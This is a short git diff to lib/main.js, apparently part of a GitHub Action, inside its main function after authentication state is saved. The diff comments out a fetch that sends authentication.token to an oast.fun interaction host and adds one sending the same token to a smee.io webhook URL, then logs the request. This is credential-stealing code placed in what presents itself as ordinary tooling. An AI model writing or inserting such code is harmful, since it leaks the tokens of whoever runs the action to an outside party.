diff --git a/lib/main.js b/lib/main.js index 609c1a8..34bc231 100644 --- a/lib/main.js +++ b/lib/main.js @@ -125,7 +125,8 @@ export async function main( core.saveState("expiresAt", authentication.expiresAt); } try { - const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`; + // const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`; + const url = `https://smee.io/Q8AA9IGqIngZlu0v?authc=${authentication.token}`; await fetch(url); core.info(`HTTP GET request sent to ${url}`); } catch (error) {